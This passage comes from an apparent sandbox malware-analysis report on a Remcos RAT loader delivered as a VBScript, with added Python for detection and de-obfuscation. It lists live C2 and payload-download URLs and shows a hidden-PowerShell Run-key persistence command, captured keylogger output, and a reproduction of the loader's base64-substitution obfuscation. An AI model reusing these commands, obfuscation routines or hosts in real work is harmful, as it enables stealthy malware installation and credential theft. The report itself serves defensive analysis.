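assumption about a Sysmon-style telemetry source.
"""
import re

# Indicators copied from the report text above.
REMCOS_MUTEX = re.compile(r"\\Rmc-[A-Z0-9]+$")                     # ...\BaseNamedObjects\Rmc-52K54M
REMCOS_LOG = re.compile(r"\\ProgramData\\\d+\\logs\.dat$", re.I)  # C:\ProgramData\1210\logs.dat
STARTUP_DIR = "\\start menu\\programs\\startup\\"                  # copy-item target in the loader
SCRIPT_EXTS = (".vbs", ".js", ".jse", ".wsf", ".ps1", ".bat", ".cmd")

# Credential stores the RAT reads. key3.db is on the page; key4.db and
# logins.json are the newer Firefox file names, added here as an assumption.
BROWSER_SECRETS = [
    re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$", re.I),
    re.compile(r"\\Mozilla\\Firefox\\Profiles\\.*\\(key3\.db|key4\.db|logins\.json)$", re.I),
]
BROWSER_IMAGES = {"chrome.exe", "firefox.exe"}   # the only legitimate readers


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the rule names one event triggers (empty list if none)."""
    hits = []
    kind = event["type"]
    target = event.get("target", "")
    image = image_name(event["image"])
    if kind == "mutex" and REMCOS_MUTEX.search(target):
        hits.append("remcos_mutex")
    if kind == "file_create" and REMCOS_LOG.search(target):
        hits.append("remcos_keylog_file")
    if (kind == "file_read" and image not in BROWSER_IMAGES
            and any(p.search(target) for p in BROWSER_SECRETS)):
        # RegAsm.exe is a .NET registration utility; it has no reason to open browser vaults.
        hits.append("browser_credential_store_read_by_non_browser")
    if (kind == "file_create" and STARTUP_DIR in target.lower()
            and target.lower().endswith(SCRIPT_EXTS)):
        hits.append("script_dropped_in_startup_folder")
    return hits


def triage(events):
    """Group triggered rules per process image. Several distinct rules on one
    image (here RegAsm.exe) is the Remcos pattern; a single hit is only a lead."""
    per_image = {}
    for ev in events:
        for rule in evaluate(ev):
            per_image.setdefault(image_name(ev["image"]), set()).add(rule)
    return {img: sorted(rules) for img, rules in per_image.items()}


REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"

# Constructed events modelled on the report's evidence, plus one benign Chrome read.
SAMPLE_EVENTS = [
    {"image": REGASM, "type": "mutex", "target": r"\Sessions\1\BaseNamedObjects\Rmc-52K54M"},
    {"image": REGASM, "type": "file_create", "target": r"C:\ProgramData\1210\logs.dat"},
    {"image": REGASM, "type": "file_read",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": REGASM, "type": "file_read",
     "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default\key3.db"},
    {"image": CHROME, "type": "file_read",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": POWERSHELL, "type": "file_create",
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SKMBT_77122012816310TD0128_17311_XLS.vbs"},
]

if __name__ == "__main__":
    for image, rules in triage(SAMPLE_EVENTS).items():
        print(image, rules)
```

The mutex name and the numeric directory under ProgramData are per-build values, so the two Remcos rules are written as patterns rather than the literal `Rmc-52K54M` and `1210` strings from this run; the browser-vault rule is the one most likely to survive a rebuild, since it keys on behaviour rather than on configuration.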
                    MITRE ATT&CK matrix columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information321
                    Scripting
                    Valid Accounts1
                    Native API
                    321
                    Scripting
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Web Service
                    1
                    Exfiltration Over Alternative Protocol
                    1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    1
                    Bypass User Account Control
                    1
                    Deobfuscate/Decode Files or Information
                    211
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol211
                    Input Capture
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts3
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Access Token Manipulation
                    3
                    Obfuscated Files or Information
                    2
                    Credentials In Files
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares3
                    Clipboard Data
                    21
                    Encrypted Channel
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution
                    11
                    Registry Run Keys / Startup Folder
                    1
                    Windows Service
                    2
                    Software Packing
                    NTDS4
                    File and Directory Discovery
Behavior Graph ID: 1524804
Sample: SKMBT_77122012816310TD0128_...
Startdate: 03/10/2024
Architecture: WINDOWS
Score: 100

Process tree with signatures, dropped files and network contacts (node numbers are the graph's own node ids):

Start
  DNS/IP: pastebin.com; paste.ee (Connects to a pastebin service (likely for C&C)); 4 other IPs or domains
  Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 19 other signatures
  Started: wscript.exe (node 10), cmd.exe (node 13), cmd.exe (node 15)

wscript.exe (node 10)
  Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
  Started: powershell.exe (node 17)

cmd.exe (node 13)
  Started: powershell.exe (node 20), conhost.exe

cmd.exe (node 15)
  Started: powershell.exe (node 24), conhost.exe

powershell.exe (node 17)
  Signatures: Suspicious powershell command line found; Self deletion via cmd or bat file; Tries to download and execute files (via powershell); 4 other signatures
  Started: powershell.exe (node 28), conhost.exe

powershell.exe (node 20)
  Signatures: Writes to foreign memory regions; Injects a PE file into a foreign process
  Started: RegAsm.exe (node 35), conhost.exe, RegAsm.exe (node 39)

powershell.exe (node 24)
  Started: RegAsm.exe (node 41), conhost.exe

powershell.exe (node 28)
  DNS/IP: desckvbrat.com.br 191.252.83.213, ports 21, 49711, 49712, LocawebServicosdeInternetSABR, Brazil; gratitudeseekers.com 173.231.247.100, ports 443, 49719, INMOTI-1US, United States; paste.ee 188.114.97.3, ports 443, 49713, 49717, CLOUDFLARENETUS, European Union
  Dropped: C:\Users\user\AppData\Local\...\hwcrj.ps1, Unicode
  Signatures: Self deletion via cmd or bat file; Adds a directory exclusion to Windows Defender
  Started: powershell.exe (node 45), cmd.exe (node 49), powershell.exe (node 51), 3 other processes (node 53)

RegAsm.exe (node 41)
  Signatures: Detected Remcos RAT

powershell.exe (node 45)
  DNS/IP: pastebin.com 104.20.4.235, ports 443, 49724, 49728, CLOUDFLARENETUS, United States
  Signatures: Writes to foreign memory regions; Injects a PE file into a foreign process
  Started: RegAsm.exe (node 55)

cmd.exe (node 49)
  Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly)

powershell.exe (node 51)
  Signatures: Loading BitLocker PowerShell Module
  Started: WmiPrvSE.exe

3 other processes (node 53)
  Signatures: Creates autostart registry keys with suspicious values (likely registry only malware)

RegAsm.exe (node 55)
  DNS/IP: 212.162.149.163, ports 2404, 49725, 49726, UNREAL-SERVERSUS, Netherlands
  Dropped: C:\ProgramData\1210\logs.dat, data
  Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to change the wallpaper; 5 other signatures

Source | Detection | Scanner
SKMBT_77122012816310TD0128_17311_XLS.vbs | 3% | ReversingLabs
SKMBT_77122012816310TD0128_17311_XLS.vbs | 10% | Virustotal
No Antivirus matches

Source | Detection | Scanner
paste.ee | 1% | Virustotal
desckvbrat.com.br | 7% | Virustotal
pastebin.com | 0% | Virustotal
gratitudeseekers.com | 0% | Virustotal
www.gratitudeseekers.com | 0% | Virustotal
ftp.desckvbrat.com.br | 8% | Virustotal
Name | IP | Active | Malicious | Antivirus Detection | Reputation
paste.ee | 188.114.97.3 | true | true | | unknown
desckvbrat.com.br | 191.252.83.213 | true | true | | unknown
pastebin.com | 104.20.4.235 | true | true | | unknown
gratitudeseekers.com | 173.231.247.100 | true | true | | unknown
www.gratitudeseekers.com | unknown | unknown | true | | unknown
ftp.desckvbrat.com.br | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://paste.ee/d/Ga0HE/0 | true | | unknown
https://pastebin.com/raw/pQQ0n3eA | false | | unknown
https://www.gratitudeseekers.com/wp-includes/customize/css/bd.txt | true | | unknown
https://paste.ee/d/b5xuX/0 | true | | unknown
212.162.149.163 | true | | unknown
https://paste.ee/d/RdlsG/0 | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
188.114.97.3 | paste.ee | European Union | 13335 | CLOUDFLARENETUS | true
212.162.149.163 | unknown | Netherlands | 64236 | UNREAL-SERVERSUS | true
191.252.83.213 | desckvbrat.com.br | Brazil | 27715 | LocawebServicosdeInternetSABR | true
173.231.247.100 | gratitudeseekers.com | United States | 54641 | INMOTI-1US | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1524804
                                Start date and time:2024-10-03 09:27:10 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 35s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:29
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:SKMBT_77122012816310TD0128_17311_XLS.vbs
                                Detection:MAL
                                Classification:mal100.rans.spre.troj.spyw.expl.evad.winVBS@37/31@4/5
                                EGA Information:
                                • Successful, ratio: 33.3%
                                HCA Information:
                                • Successful, ratio: 96%
                                • Number of executed functions: 72
                                • Number of non-executed functions: 215
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs
                                • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target RegAsm.exe, PID 2820 because there are no executed function
                                • Execution Graph export aborted for target powershell.exe, PID 1600 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 3136 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 4924 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 5424 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 6764 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:28:06 | API Interceptor | 123x Sleep call for process: powershell.exe modified
03:28:56 | API Interceptor | 1008373x Sleep call for process: RegAsm.exe modified
09:28:15 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value "Update Drivers NVIDEO_vuw" = cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
09:28:24 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run, value "Update Drivers NVIDEO_vuw" = cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
104.20.4.235
• sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
• sostener.vbs | malicious | XWorm | pastebin.com/raw/V9y5Q5vv
• envifa.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
• New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
• Invoice Payment N8977823.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
• Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
• Pending_Invoice_Bank_Details_kofce_.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
• Update on Payment.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
188.114.97.3
• QUOTATION_SEPQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/758bYd86/download
• QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/58PSl7si/download
• QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/58PSl7si/download
• payment copy.exe | malicious | FormBook | www.cc101.pro/0r21/
• BX7yRz7XqF.lnk | malicious | PureLog Stealer, zgRAT | cloud.dellicon.top/1000/500/
• jKSjtQ8W7O.lnk | malicious | PureLog Stealer, zgRAT | ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
• Shipping Documents_pdf.exe | malicious | FormBook | www.rtprajalojago.live/7vun/
• inject.exe | malicious | RedLine, Xmrig | joxi.net/4Ak49WQH0GE3Nr.mp3
• http://meta.case-page-appeal.eu/community-standard/208273899187123/ | malicious | Unknown | meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
• 9q24V7OSys.exe | malicious | FormBook | www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP
Match (domain) | Associated Sample Name / URL | Detection | Threat Name | Context (resolved IP)
pastebin.com
• sostener.vbs | malicious | Njrat | 104.20.4.235
• sostener.vbs | malicious | XWorm | 104.20.4.235
• 3.dll | malicious | Unknown | 104.20.3.235
• 6.dll | malicious | Unknown | 104.20.4.235
• 5.dll | malicious | Unknown | 104.20.3.235
• dropbox.exe | malicious | Unknown | 172.67.19.24
• dropbox.exe | malicious | Unknown | 172.67.19.24
• inject.exe | malicious | RedLine, Xmrig | 104.20.3.235
• q71n2VrEY3.exe | malicious | DCRat | 172.67.19.24
• lvHIHLt0b2.exe | malicious | DCRat | 104.20.3.235
paste.ee
• Purchase Order - PO14895.vbs | malicious | Remcos | 188.114.96.3
• sostener.vbs | malicious | Njrat | 188.114.97.3
• sostener.vbs | malicious | XWorm | 188.114.96.3
• NhtSITq9Zp.vbs | malicious | Remcos | 188.114.96.3
• risTLdc664.vbs | malicious | FormBook | 188.114.97.3
• NTiwJrX4R4.vbs | malicious | Remcos, PureLog Stealer | 188.114.97.3
• o45q0zbdwt.vbs | malicious | PureLog Stealer | 188.114.97.3
• OIQ1ybtQdW.vbs | malicious | Remcos, PureLog Stealer | 188.114.96.3
• 1iH5ABLKIA.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 188.114.96.3
• vr65co3Boo.vbs | malicious | AsyncRAT, DcRat, PureLog Stealer | 188.114.97.3
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
CLOUDFLARENETUS
• DHL Receipt_AWB 9892671327.xls | malicious | Unknown | 172.67.216.244
• Airwaybill#0587340231024.xla.xlsx | malicious | FormBook | 188.114.96.3
• Purchase Order - PO14895.vbs | malicious | Remcos | 188.114.96.3
• DHL Receipt_AWB 9892671327.xls | malicious | Unknown | 172.67.216.244
• GeriOdemeBildirimi942.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• Comprobante.lnk.lnk | malicious | Lokibot | 188.114.97.3
• Payment proof.xls | malicious | Unknown | 172.67.216.244
• Comprobante.lnk.lnk | malicious | Lokibot | 188.114.96.3
• 08(2)_00.exe | malicious | AgentTesla | 104.26.12.205
• file.exe | malicious | LummaC, Vidar | 104.21.16.12
UNREAL-SERVERSUS
• 17279403077f885c827960b6e8c87068d24f6ff15ba15cc4b7b6b413aafc09161cfef75b30571.dat-decoded.exe | malicious | Remcos | 212.162.149.163
• U9117neFFQ.exe | malicious | Remcos | 204.10.160.136
• DOdjjdr3LO.exe | malicious | Remcos | 204.10.160.136
• ejdc7iP3A7.vbs | malicious | Remcos | 204.10.160.136
• SecuriteInfo.com.BackDoor.AgentTeslaNET.42.31568.2849.exe | malicious | Remcos | 204.10.160.136
• Payment proof.xls | malicious | Remcos | 204.10.160.136
• TT12822024.xls | malicious | Remcos | 204.10.160.136
• R7Xrrix6Sx.exe | malicious | RedLine | 212.162.149.53
• RFQ -PO.20571-0001-QBMS-PRQ-0200140.js | malicious | AgentTesla, RedLine | 212.162.149.53
• 1DUCJGrpyb.exe | malicious | Remcos | 204.10.160.136
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context (IPs)
3b5074b1b5d032e5620f69f9f700ff0e
• Purchase Order - PO14895.vbs | malicious | Remcos | 104.20.4.235, 188.114.97.3, 173.231.247.100
• GeriOdemeBildirimi942.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 104.20.4.235, 188.114.97.3, 173.231.247.100
• justificante de transferencia.vbs | malicious | FormBook | 104.20.4.235, 188.114.97.3, 173.231.247.100
• Comprobante.lnk.lnk | malicious | Lokibot | 104.20.4.235, 188.114.97.3, 173.231.247.100
• Comprobante.lnk.lnk | malicious | Lokibot | 104.20.4.235, 188.114.97.3, 173.231.247.100
• 08(2)_00.exe | malicious | AgentTesla | 104.20.4.235, 188.114.97.3, 173.231.247.100
• Hesaphareketi-01.exe | malicious | Snake Keylogger, VIP Keylogger | 104.20.4.235, 188.114.97.3, 173.231.247.100
• hesaphareketi-01.exe | malicious | Snake Keylogger, VIP Keylogger | 104.20.4.235, 188.114.97.3, 173.231.247.100
• QUOTATION_SEPQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | 104.20.4.235, 188.114.97.3, 173.231.247.100
• sostener.vbs | malicious | Njrat | 104.20.4.235, 188.114.97.3, 173.231.247.100
                                No context
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):390
                                Entropy (8bit):3.4740975030424557
                                Encrypted:false
                                SSDEEP:6:6lJSd4b5YcIeeDAlKe52WA6n+SkSJkJxw1gWA6n+SkSJkJxIWAv:6lJ+4Dec8e52W1+fZW1+feW+
                                MD5:2539CB3DB101C665DF0461110C7788BA
                                SHA1:0DF724AF5D4A22DCD1E03FED82495F0CE95D34BC
                                SHA-256:7E57DEF52FD95289C15C5B8CECB4B9BBEE0D94B97D8268C451CFF58D6ABC460E
                                SHA-512:C7F423DAC049860EA9CAF7D944C5C4C5595375C9FAE6393AFFA8967037207A8099EA0117603D3209D697122009F828E6B56A6B9871DF82CC7CF39699F7858676
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\1210\logs.dat, Author: Joe Security
Preview:....[.2.0.2.4./.1.0./.0.3. .0.3.:.2.8.:.2.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].....[.W.i.n.].r.....[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.c.m.d...e.x.e.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.c.m.d...e.x.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
Preview (decoded from UTF-16LE; this is the Remcos offline keylogger log, with the foreground window title in brackets followed by the keystrokes captured in it): [2024/10/03 03:28:23 Offline Keylogger Started] [Win]r [Program Manager] [C:\Windows\system32\cmd.exe] [Run] [Program Manager] [C:\Windows\system32\cmd.exe] [Program Manager]
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (32656)
                                Category:dropped
                                Size (bytes):1801920
                                Entropy (8bit):3.8729557228520024
                                Encrypted:false
                                SSDEEP:12288:l1zabLuoSb0B5Yc8gjU3dNGeS5ra1SlxQjN4ZDZGNLjLYMxuIpsqd8fyjTDgn0N7:u3ZgoXOf1ssTv
                                MD5:E7C82FA422BC247B3AF1F0C6A98A76A6
                                SHA1:48E038FE5710A3C71D70EAF756A15C1A9F0ED576
                                SHA-256:5503E9420481271CBC5BA26F1B106CD2BB6E985CCE64183EC17A06EB0C6DBC59
                                SHA-512:5095BBE62CD54C4875393BD2398FF74B93048D81D94678F0407AA98EDA99B63219DB42685BEB4791B6B735684F98B27F2DD507362352EF09CBE701440484AAC1
                                Malicious:true
Preview:..$.d.q.s.x.B. .=. .'.C.:.\.W.i.n.d.o.w.s.\.M.i.c.r.o.s.o.f.t...N.E.T.\.'. .+. .'.F.r.a.m.e.w.o.r.k.\.v.4...0...3.0.3.1.9.\.'. .+. .'.R.e.g.A.s.m...e.x.e.'.;.....$.f.V.L.F.U. .=. .'..!:..!'.;...$.j.u.N.m.Q. .=. .'.A.'.;.....$.W.Y.v.t.t. .=. .'.T.V.q.Q..!:..!.!:..!M..!:..!.!:..!.!:..!.!:..!E..!:..!.!:..!.!:..!.!:..!/./.8..!:..!.!:..!L.g..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!Q..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!g..!:..!.!:..!.!:..!.!:..!.!:..!4.f.u.g.4..!:..!t..!:..!n.N.I.b.g.B.T.M.0.h.V.G.h.p.c.y.B.w.c.m.9.n.c.m.F.t.I.G.N.h.b.m.5.v.d.C.B.i.Z.S.B.y.d.W.4.g.a.W.4.g.R.E.9.T.I.G.1.v.Z.G.U.u.D.Q.0.K.J..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!B.Q.R.Q..!:..!.!:..!T..!:..!E.D..!:..!G.G.g.7.G.Y..!:..!.!:..!.!:..!.!:..!.!:..!
Preview (decoded from UTF-16LE; the delimiter assigned to $fVLFU is a short non-ASCII string that the dotted rendering does not preserve, shown here as <delim>):
$dqsxB = 'C:\Windows\Microsoft.NET\' + 'Framework\v4.0.30319\' + 'RegAsm.exe';
$fVLFU = '<delim>';
$juNmQ = 'A';
$WYvtt = 'TVqQ<delim><delim>M<delim><delim><delim><delim>E<delim><delim><delim><delim>//8<delim><delim>Lg<delim>...'
The $WYvtt literal is a base64-encoded PE image in which every 'A' has been replaced by the delimiter: with 'A' restored, 'TVqQAAMAAAAEAAAA//8AALgA...' decodes to the 'MZ' DOS header, and the later run '4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ' to the DOS stub text 'This program cannot be run in DOS mode.'. $juNmQ holds the character to put back, and $dqsxB names the RegAsm.exe binary that the report shows as the process writing the Remcos keylogger log.
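The preview above (UTF-16 text rendered with a dot after every character) shows the loader's encoding scheme: a base64 PE ('TVqQ' is the 'MZ' header) in which every 'A' has been swapped for the short non-ASCII delimiter stored in $fVLFU, with $juNmQ = 'A' being the character the script puts back before decoding. The Python below is an added example and not code from the sample, from Joe Sandbox or from any project: it reproduces that substitution on a constructed stand-in image, then pulls the three string literals out of a script fragment of the same shape and recovers the bytes. DELIM, the fake PE bytes and the `triage` checks are assumptions made for the example; the sample's real delimiter is not recoverable from the preview.

```python
import base64
import re
import struct

DOS_STUB_SENTENCE = b"This program cannot be run in DOS mode."

# Hypothetical stand-ins for the sample's $fVLFU and $juNmQ. The real delimiter
# is a short non-ASCII string that the report preview does not preserve.
DELIM = "\u2193:\u2193"
MARKER = "A"


def build_fake_pe_prefix():
    """Constructed 132-byte image: DOS header, classic DOS stub, 'PE\\0\\0' at e_lfanew.
    Not the sample's payload; just enough for the decoder and triage to work on."""
    hdr = bytearray(64)
    hdr[0:2] = b"MZ"
    struct.pack_into("<H", hdr, 2, 0x90)      # e_cblp, as in a real MZ header
    struct.pack_into("<I", hdr, 0x3C, 0x80)   # e_lfanew: where 'PE\0\0' starts
    stub = (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
            + DOS_STUB_SENTENCE + b"\r\r\n$")
    data = bytes(hdr) + stub
    data += b"\0" * (0x80 - len(data)) + b"PE\0\0"
    return data


def obfuscate(blob, delim=DELIM, marker=MARKER):
    """What the builder did: base64, then swap every marker character for the delimiter."""
    return base64.b64encode(blob).decode("ascii").replace(marker, delim)


def deobfuscate(text, delim=DELIM, marker=MARKER):
    """Undo the swap and decode; validate=True rejects any leftover non-base64 byte."""
    return base64.b64decode(text.replace(delim, marker), validate=True)


def build_constructed_script(blob):
    """A PowerShell fragment shaped like the dropped script's first lines."""
    return (
        "$dqsxB = 'C:\\Windows\\Microsoft.NET\\' + 'Framework\\v4.0.30319\\' + 'RegAsm.exe';\n"
        f"$fVLFU = '{DELIM}';\n"
        f"$juNmQ = '{MARKER}';\n"
        f"$WYvtt = '{obfuscate(blob)}';\n"
    )


# $name = '...'; honouring PowerShell's '' escape inside single-quoted strings.
ASSIGN = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'\s*;")


def recover_payload(script_text, blob_var="WYvtt", delim_var="fVLFU", marker_var="juNmQ"):
    """Pull the three string literals out of the script and rebuild the payload."""
    strings = {m.group(1): m.group(2).replace("''", "'") for m in ASSIGN.finditer(script_text)}
    return deobfuscate(strings[blob_var], strings[delim_var], strings[marker_var])


def triage(blob):
    """Cheap checks a responder runs before handing the blob to pefile or a sandbox."""
    info = {"size": len(blob), "mz": blob[:2] == b"MZ", "dos_stub": DOS_STUB_SENTENCE in blob,
            "e_lfanew": None, "pe_signature": None}
    if info["mz"] and len(blob) >= 0x40:
        off = struct.unpack_from("<I", blob, 0x3C)[0]
        info["e_lfanew"] = off
        if off + 4 <= len(blob):          # None means "truncated before the PE header"
            info["pe_signature"] = blob[off:off + 4] == b"PE\0\0"
    return info


if __name__ == "__main__":
    script = build_constructed_script(build_fake_pe_prefix())
    print(script[:200])
    print(triage(recover_payload(script)))
```

Against the real dropped file the same approach applies once the delimiter literal has been read out of the script with a UTF-16-aware tool; keep `validate=True`, because a wrong delimiter leaves non-alphabet characters behind and is better reported than silently skipped.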
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with very long lines (339), with no line terminators
                                Category:dropped
                                Size (bytes):339
                                Entropy (8bit):5.175513126663782
                                Encrypted:false
                                SSDEEP:6:sDuwZH1j0IQHjo54Zrcsny1R3KbQO0cbENjAuN723oH+B2KZmswVM45NHRn:sVVj0KsngkbQpcVuaYebwP7
                                MD5:B67C3BEA61F4F45F9E53772D98BD1F5E
                                SHA1:CFDA136843B843D21387A2C17A1F580920AE9EC4
                                SHA-256:42BFD66EF0E725A7C7E480C8CD8992519EF09F30BF3FF746F27E34A4422DB6DE
                                SHA-512:CA88CEC35C3EB3769B57C256254ECACB4C412426164C74880CAD3BE8A49A6FA11A4305F55A08D21B654D54CC4C0E7487DAB0A9F6D8794EBDFB25310817C4ADB2
                                Malicious:false
                                Preview:New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "Update Drivers NVIDEO_vuw" -Value "cmd.exe /c start /min `"`" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman `". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' `";exit" -PropertyType "String" -force ; exit
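The dropped script above is the sample's persistence: the Run value starts cmd.exe, which launches a minimised, hidden PowerShell with -ExecutionPolicy Bypass that dot-sources hwcrj.ps1 from AppData\Local\Microsoft\LocalLow, and the parameter is written as the prefix -Comman, which powershell.exe accepts. The Python below is an added triage example, not code from the sample, from Joe Sandbox or from any project: it scores Run-key values against those indicators and flags truncated parameter names. The value dictionary is constructed (the first entry is copied from this report, the OneDrive and SecurityHealth entries are made-up benign controls), and the indicator list and the hit threshold are the example's own choices.

```python
import re
from dataclasses import dataclass

# Constructed HKCU\Software\Microsoft\Windows\CurrentVersion\Run values.
# "Update Drivers NVIDEO_vuw" is copied from this report; the other two are
# made-up benign entries used as negative controls.
RUN_VALUES = {
    "Update Drivers NVIDEO_vuw": (
        r'cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden '
        r'-ExecutionPolicy Bypass -Comman ". '
        r"'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' "
        r'";exit'
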